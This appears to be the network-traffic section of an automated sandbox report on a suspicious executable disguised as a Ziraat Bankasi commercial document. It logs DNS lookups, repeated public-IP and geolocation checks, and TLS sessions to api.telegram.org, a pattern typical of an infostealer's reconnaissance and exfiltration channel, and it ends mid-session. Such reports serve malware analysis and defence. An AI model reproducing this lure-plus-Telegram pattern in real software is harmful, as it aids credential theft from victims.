                                      Sep 26, 2024 11:03:06.974895000 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:06.975016117 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:06.975099087 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:06.975496054 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:06.975529909 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.606411934 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.610816956 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.610866070 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.610949993 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.610965014 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.955950975 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.956062078 CEST44349920149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.956193924 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.959443092 CEST49920443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.959445953 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.959536076 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:07.959758997 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.960033894 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:07.960068941 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:08.578810930 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:08.691503048 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.133400917 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.133464098 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:09.133527040 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.133548021 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:09.452225924 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:09.452445030 CEST44349921149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:09.452511072 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.453026056 CEST49921443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.454387903 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.454447985 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:09.454714060 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.455018044 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:09.455063105 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.098932028 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.100888968 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.100946903 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.101047039 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.101069927 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.431684971 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.431899071 CEST44349922149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.432274103 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.432396889 CEST49922443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.433984995 CEST49923443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.434081078 CEST44349923149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:10.434323072 CEST49923443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.438249111 CEST49923443192.168.2.4149.154.167.220
                                      Sep 26, 2024 11:03:10.438287020 CEST44349923149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:11.047128916 CEST44349923149.154.167.220192.168.2.4
                                      Sep 26, 2024 11:03:11.097788095 CEST49923443192.168.2.4149.154.167.220

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 26, 2024 10:59:05.314395905 CEST6350153192.168.2.41.1.1.1
                                      Sep 26, 2024 10:59:05.321309090 CEST53635011.1.1.1192.168.2.4
                                      Sep 26, 2024 10:59:08.391640902 CEST5758453192.168.2.41.1.1.1
                                      Sep 26, 2024 10:59:08.403208971 CEST53575841.1.1.1192.168.2.4
                                      Sep 26, 2024 10:59:24.408644915 CEST6110053192.168.2.41.1.1.1
                                      Sep 26, 2024 10:59:24.415796995 CEST53611001.1.1.1192.168.2.4
                                      Sep 26, 2024 11:00:25.132070065 CEST5750953192.168.2.41.1.1.1
                                      Sep 26, 2024 11:00:25.138638020 CEST53575091.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Sep 26, 2024 10:59:05.314395905 CEST192.168.2.41.1.1.10xc390Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:08.391640902 CEST192.168.2.41.1.1.10x88faStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:24.408644915 CEST192.168.2.41.1.1.10x17ddStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                      Sep 26, 2024 11:00:25.132070065 CEST192.168.2.41.1.1.10x39e6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Sep 26, 2024 10:59:05.321309090 CEST1.1.1.1192.168.2.40xc390No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                      Sep 26, 2024 10:59:05.321309090 CEST1.1.1.1192.168.2.40xc390No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:05.321309090 CEST1.1.1.1192.168.2.40xc390No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:05.321309090 CEST1.1.1.1192.168.2.40xc390No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:05.321309090 CEST1.1.1.1192.168.2.40xc390No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:05.321309090 CEST1.1.1.1192.168.2.40xc390No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:08.403208971 CEST1.1.1.1192.168.2.40x88faNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:08.403208971 CEST1.1.1.1192.168.2.40x88faNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                      Sep 26, 2024 10:59:24.415796995 CEST1.1.1.1192.168.2.40x17ddNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                      Sep 26, 2024 11:00:25.138638020 CEST1.1.1.1192.168.2.40x39e6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • reallyfreegeoip.org
                                      • api.telegram.org
                                      • checkip.dyndns.org

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449733193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:05.357048035 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Sep 26, 2024 10:59:05.997343063 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 074d49ae28944c1c725ef1e502cb7f7f
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Sep 26, 2024 10:59:06.002342939 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Sep 26, 2024 10:59:08.343424082 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:08 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: d31c4d7987337e3d95c86228dc98057f
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Sep 26, 2024 10:59:09.118949890 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Sep 26, 2024 10:59:10.368966103 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:10 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 7d9ae0f0753ad7fe04c5fee1d0258c60
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449738193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:10.991296053 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Sep 26, 2024 10:59:11.648478985 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:11 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 34222db666a8983bdb91ee95b866263c
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449740193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:12.269133091 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Sep 26, 2024 10:59:13.033413887 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:12 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 9b499c3cb766c2a2d13d00c69cbb25a4
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449742193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:13.648430109 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Sep 26, 2024 10:59:14.769654989 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:14 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: e61212baef27d99e66b438291c059072
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.449744193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:15.404601097 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Sep 26, 2024 10:59:16.030569077 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:15 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 0099e94ae859d06e3d197fee8224f54a
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.449746193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:16.706152916 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Sep 26, 2024 10:59:17.389434099 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:17 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: ecd7950360916e18b2cd2d24de9b7671
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.449748193.122.6.168807124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 26, 2024 10:59:18.015191078 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Sep 26, 2024 10:59:18.649880886 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:18 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 27839d2c796b5fa506021c7016e8f238
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.449735188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:08 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:09 UTC683INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:09 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5981
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KDQ%2FhknwOyvJdOorfgnj7taT2VL7X2zEefdC2Rry08kexRZQWG6rHtyQ2LV%2BHYliMdOfv054AVqZUHbmjryKM5cMeU%2FX%2Fneb%2BXH53ZJgRloPc%2FF8xGq4nvt%2Fn2GrMnRPMcxN3X9G"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e658bfb4393-EWR
                                      2024-09-26 08:59:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449737188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:10 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-09-26 08:59:10 UTC677INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:10 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5982
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQPmrdBy8Vl%2BKbkCyH5Iorr03%2B9L0z7iGKVu698ie%2FN8TfoizrJmu6598GKi4H0Y0IReYbOIVHpar85gJQelYO1ubEw3GOLjqXkB%2FI4AMfAAV5oEMxYofrGGjJ4FhA5nKSgAsrWP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e714d8cc359-EWR
                                      2024-09-26 08:59:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449739188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 08:59:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-09-26 08:59:12 UTC679INHTTP/1.1 200 OK
                                      Date: Thu, 26 Sep 2024 08:59:12 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 5984
                                      Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dYGJHBWdHVF0zLc%2FAp0joUvb4s56FEpU0KUGWi%2BA0FRANwuMiFu6Tu072tPI8QRjKdFI3uZDcWBHaoOtCR0Zp4wohnktFQePdyx0oWbCNN9JVlyF%2FeEgYPtQTof5IOnjJ%2BA8d3%2BX"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8c920e79390041d9-EWR
                                      2024-09-26 08:59:12 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-09-26 08:59:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449741188.114.96.34437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
